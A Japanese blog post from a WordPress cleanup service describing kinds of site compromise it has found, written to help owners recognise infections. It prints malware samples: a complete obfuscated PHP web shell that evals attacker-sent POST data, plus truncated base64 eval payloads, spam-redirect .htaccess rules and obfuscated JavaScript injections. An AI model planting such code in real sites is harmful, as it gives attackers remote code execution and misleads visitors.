ワードプレスドクターでは多数のクライアント様の改ざん被害を復旧してきました。今回は、どのような改ざんがワードプレスにされていたかの実例をいくつか公開したいと思います。
cleaning-268107_960_720

〜.suspectedファイルがサイト内に大量生成

.suspectedという拡張子で、多数のファイルがワードプレス内の書き込み可権限のフォルダ内に生成されます。コードは下記のような内容です

$mdgv0="pt_os"; $zxd9=strtoupper ($mdgv0[2]. $mdgv0[0]. $mdgv0[3].$mdgv0[4]. $mdgv0[1]);if(isset (${ $zxd9 } [ 'qab6e1b' ] ) ) { eval (${$zxd9 } ['qab6e1b'] ) ;} 

このコードは、pt_osを入れ変えて、_postという文字列を作り、postデータを受け取ってそのプログラムをevalで実行するというどのようなコードもハッカーの手によって実行できる大変危険な物です。回りくどい書き方をしているのは_postという文字列でパターンマッチング検出されない為でしょう。

 ほとんど全ての投稿に <a style=”text-decoration:none” href=”/plendil-buy-….”>.</a> という文字列が挿入されている

このコードはSEOスパムと言い、href=”で示されるドメインにリンクを張って、SEO強化を行うハッキング改ざん例です。投稿に文字列が差し挟まれる事から、管理者権限の奪取やその他メール投稿の仕組みの脆弱性を利用して行われます

base64_decode改ざん

このタイプの改ざんのコードの例は下記のような物となります。base64_decodeで人間には判読しづらいbase64でエンコードされた文字列をプログラムに戻して、evelで命令文として実行します。base64_decode内にはスパムメールの送信プログラム等が含まれています

eval(base64_decode("aWYoZnVuY3Rpb25f....jgfSAgfQ=="));?>

.htaccessファイルの大量生成

様々なフォルダに、不要な.htaccessが大量生成されます。コード内容は、リダイレクト処理等の他のサイトへの誤誘導のコードです。特定の文字列を含むページへのアクセスが合ったときに、流入させたいページへのリダイレクトを行い、そのリンクをスパムメール等に含んで送信されます。

RewriteCond %{HTTP_REFERER} ^.*(google|ask....suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuch....indloo|kobala|limier)\.(.*)
RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]

Javascriptファイルの末尾に大量改ざん

ワードプレスで標準使用されているjQuery等のjsファイルの末尾に改ざんコードが追加されます。コードは/*76we65sadradfyfa…62qetafduaygdau*/のような判読できないコメントで始まって書かれ、コード部分には大量の\x32\x32\x32\x32\x32\x32 のような難読化された改ざんコードが挿入されます。

/*76we65sadradfyfa...62qetafduaygdau*/
window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"] ["\x66\x6....
/*76we65sadradfyfa...62qetafduaygdau*/

Javascriptファイルに命令文が追加eval(fu​nction(p,a,c,k,e,d)

このタイプのハッキングもJavascriptファイルに埋め込まれる物です。eval(fu​nction(p,a,c,k,e,d)から始まり難読化されたプログラムを含んだコードが実行されます

 <sc​ript type="text/javascript">eval(fu​nction(p,a,c,k,e,d){e=fu​nction(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[fu​nction(e){return d[e]}];e=fu​nction(){re​turn'\\w+'};c=1}....

header.php,footer.phpへの改ざんコード混入

最近では多少古い手法ですが、テーマのheader.php,footer.phpは、全てのページで読み込まれる為改ざんして、リンクやバナーを挿入したり、XSS攻撃で御社のサイトに訪ねてきたユーザーを誤誘導するにはハッカーにとっては効果的な手法となっています。大抵の場合、コードの一番最初にエンコードされた状態で改ざんコードが挿入するため目視でも見分ける事が出来ます
改ざん例

echo base64_decode("VZAAtb5swEP....asdAA78kja");
@include_once("../wp-includes/gy2tI.php");

その他にもワードプレスドクターではパターンマッチングで様々な改ざんを検出し、御社のサイトをクリーンアップいたします。サイトの感染が疑われたら私たちにご相談ください

WordPressの改ざん被害からの復旧はワードプレスドクターにご依頼ください